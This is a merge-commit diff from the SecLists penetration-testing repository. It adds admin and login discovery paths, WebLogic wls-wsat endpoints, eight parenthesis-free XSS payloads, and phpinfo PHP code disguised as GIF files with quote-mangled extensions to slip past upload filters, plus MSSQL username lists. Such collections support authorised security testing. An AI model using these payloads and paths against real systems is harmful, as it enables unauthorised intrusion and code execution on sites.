Merge branch 'master' of https://github.com/danielmiessler/SecLists into misc

# Conflicts: # Discovery/Infrastructure/common-router-ips.txt
2025-05-06 19:03:08 +00:00 · 2019-07-09 12:15:28 +01:00 · 2019-07-09 12:15:28 +01:00 · 11b967a88f
commit 11b967a88f
parent 1d768dbf9a 503c57f500
30 changed files with 197773 additions and 1 deletions
--- a/Discovery/DNS/bitquark-subdomains-top100000.txt
+++ b/Discovery/DNS/bitquark-subdomains-top100000.txt
--- a/Discovery/DNS/deepmagic.com-prefixes-top500.txt
+++ b/Discovery/DNS/deepmagic.com-prefixes-top500.txt
--- a/Discovery/DNS/deepmagic.com-prefixes-top50000.txt
+++ b/Discovery/DNS/deepmagic.com-prefixes-top50000.txt
--- a/Discovery/DNS/subdomains-top1million-110000.txt
+++ b/Discovery/DNS/subdomains-top1million-110000.txt
--- a/Discovery/DNS/subdomains-top1million-20000.txt
+++ b/Discovery/DNS/subdomains-top1million-20000.txt
--- a/Discovery/DNS/subdomains-top1million-5000.txt
+++ b/Discovery/DNS/subdomains-top1million-5000.txt
--- a/Discovery/Infrastructure/nmap-ports-top1000.txt
+++ b/Discovery/Infrastructure/nmap-ports-top1000.txt
--- a/Discovery/Web-Content/CMS/sitecore
+++ b/Discovery/Web-Content/CMS/sitecore
@ -0,0 +1,16 @@
+/App_Config
+/App_Config/ConnectionStrings.config
+/sitecore/
+/sitecore/admin
+/sitecore/admin/login.aspx
+/sitecore/debug
+/sitecore/default.aspx
+/sitecore/login
+/sitecore/login.aspx
+/sitecore/login/default.aspx
+/sitecore/shell/WebService
+/sitecore/shell/webservice/service.asmx
+/sitecore/shell/webservice/service2.asmx
+/sitecore/shell/sitecore.version.xml
+/sitecore/service
+/sitecore/service/nolayout.aspx
--- a/Discovery/Web-Content/Logins.fuzz.txt
+++ b/Discovery/Web-Content/Logins.fuzz.txt
@ -11,6 +11,8 @@
 /admin-login
 /admin-login/
 /admin/
+/admin/auth.inc
+/admin/auth.inc.php
 /administrator
 /administrator/
 /administrator.asp
@ -23,6 +25,12 @@
 /administrator.py
 /administrator.rb
 /admnistrator.php3
+/auth
+/auth/
+/auth.inc
+/auth.inc.php
+/authentication
+/authentication/
 /backend
 /backend/
 /cgi-bin/sqwebmail?noframes=1
@ -57,6 +65,9 @@
 /logon.pl
 /logon.py
 /logon.rb
+/?page=admin.auth.inc
+/?page=auth.inc
+/?page=auth.inc.php
 /signin
 /signin/
 /signin.php?ret=
--- a/Discovery/Web-Content/api/api-seen-in-wild.txt
+++ b/Discovery/Web-Content/api/api-seen-in-wild.txt
--- a/Discovery/Web-Content/quickhits.txt
+++ b/Discovery/Web-Content/quickhits.txt
@ -810,6 +810,7 @@
 /blog/wp-content/backup-db/
 /blog/wp-content/backups/
 /bot.txt
+/bower.json
 /buck.sql
 /build.gradle
 /build.local.xml
--- a/Discovery/Web-Content/weblogic.txt
+++ b/Discovery/Web-Content/weblogic.txt
@ -38,6 +38,15 @@
 /HTTPClntRecv/*
 /HTTPClntSend
 /HTTPClntSend/*
+/wls-wsat/CoordinatorPortType
+/wls-wsat/CoordinatorPortType11
+/wls-wsat/ParticipantPortType
+/wls-wsat/ParticipantPortType11
+/wls-wsat/RegistrationPortTypeRPC
+/wls-wsat/RegistrationPortTypeRPC11
+/wls-wsat/RegistrationRequesterPortType
+/wls-wsat/RegistrationRequesterPortType11
+/_async/AsyncResponseService
 /JspServlet
 /LogfileSearch
 /LogfileTail
--- a/Fuzzing/XSS/xss-without-parentheses-semi-colons-portswigger.txt
+++ b/Fuzzing/XSS/xss-without-parentheses-semi-colons-portswigger.txt
@ -0,0 +1,8 @@
+<script>onerror=alert;throw 1337</script>
+<script>{onerror=alert}throw 1337</script>
+<script>throw onerror=alert,'some string',123,'haha'</script>
+<script>{onerror=eval}throw'=alert\x281337\x29'</script>
+<script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script>
+<script>{onerror=prompt}throw{lineNumber:1,columnNumber:1,fileName:'second argument',message:'first argument'}</script>
+<script>throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]</script>
+<script>TypeError.prototype.name ='=/',0[onerror=eval]['/-alert(1)//']</script>
--- a/Miscellaneous/domains-1million-top.txt
+++ b/Miscellaneous/domains-1million-top.txt
--- a/Passwords/mssql-passwords-nansh0u-guardicore.txt
+++ b/Passwords/mssql-passwords-nansh0u-guardicore.txt
--- a/Passwords/richelieu-french-top20000.txt
+++ b/Passwords/richelieu-french-top20000.txt
--- a/Passwords/richelieu-french-top5000.txt
+++ b/Passwords/richelieu-french-top5000.txt
--- a/Payloads/File-Names/max-length/make-255.sh
+++ b/Payloads/File-Names/max-length/make-255.sh
@ -1,4 +1,4 @@
-#/bin/sh
+#!/bin/sh
 #$ msf-pattern_create -l 255
 touch Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4

--- a/Payloads/PHPInfo/make-aio.sh
+++ b/Payloads/PHPInfo/make-aio.sh
@ -0,0 +1,5 @@
+#!/bin/sh
+zip phpinfo-aio.zip phpinfo*.{p*,txt,jp*g,gif}
+
+tar -cvf phpinfo-aio.tar phpinfo*.{p*,txt,jp*g,gif}
+
--- a/Payloads/PHPInfo/phpinfo-aio.tar
+++ b/Payloads/PHPInfo/phpinfo-aio.tar
--- a/Payloads/PHPInfo/phpinfo-aio.zip
+++ b/Payloads/PHPInfo/phpinfo-aio.zip
--- a/Payloads/PHPInfo/phpinfo.""gif
+++ b/Payloads/PHPInfo/phpinfo.""gif
@ -0,0 +1,2 @@
+GIF89a1
+
<?php phpinfo(); ?>
--- a/Payloads/PHPInfo/phpinfo."gif
+++ b/Payloads/PHPInfo/phpinfo."gif
@ -0,0 +1,2 @@
+GIF89a1
+
<?php phpinfo(); ?>
--- a/Payloads/PHPInfo/phpinfo.''gif
+++ b/Payloads/PHPInfo/phpinfo.''gif
@ -0,0 +1,2 @@
+GIF89a1
+
<?php phpinfo(); ?>
--- a/Payloads/PHPInfo/phpinfo.'gif
+++ b/Payloads/PHPInfo/phpinfo.'gif
@ -0,0 +1,2 @@
+GIF89a1
+
<?php phpinfo(); ?>
--- a/Payloads/PHPInfo/phpinfo.php.""gif
+++ b/Payloads/PHPInfo/phpinfo.php.""gif
@ -0,0 +1,2 @@
+GIF89a1
+
<?php phpinfo(); ?>
--- a/Payloads/PHPInfo/phpinfo.php."gif
+++ b/Payloads/PHPInfo/phpinfo.php."gif
@ -0,0 +1,2 @@
+GIF89a1
+
<?php phpinfo(); ?>
--- a/Payloads/PHPInfo/phpinfo.php.''gif
+++ b/Payloads/PHPInfo/phpinfo.php.''gif
@ -0,0 +1,2 @@
+GIF89a1
+
<?php phpinfo(); ?>
--- a/Payloads/PHPInfo/phpinfo.php.'gif
+++ b/Payloads/PHPInfo/phpinfo.php.'gif
@ -0,0 +1,2 @@
+GIF89a1
+
<?php phpinfo(); ?>
--- a/Usernames/mssql-usernames-nansh0u-guardicore.txt
+++ b/Usernames/mssql-usernames-nansh0u-guardicore.txt
@ -0,0 +1,10 @@
+admin
+bwsa
+hbv7
+kisadmin
+su
+sa
+test
+users
+vice
+wwo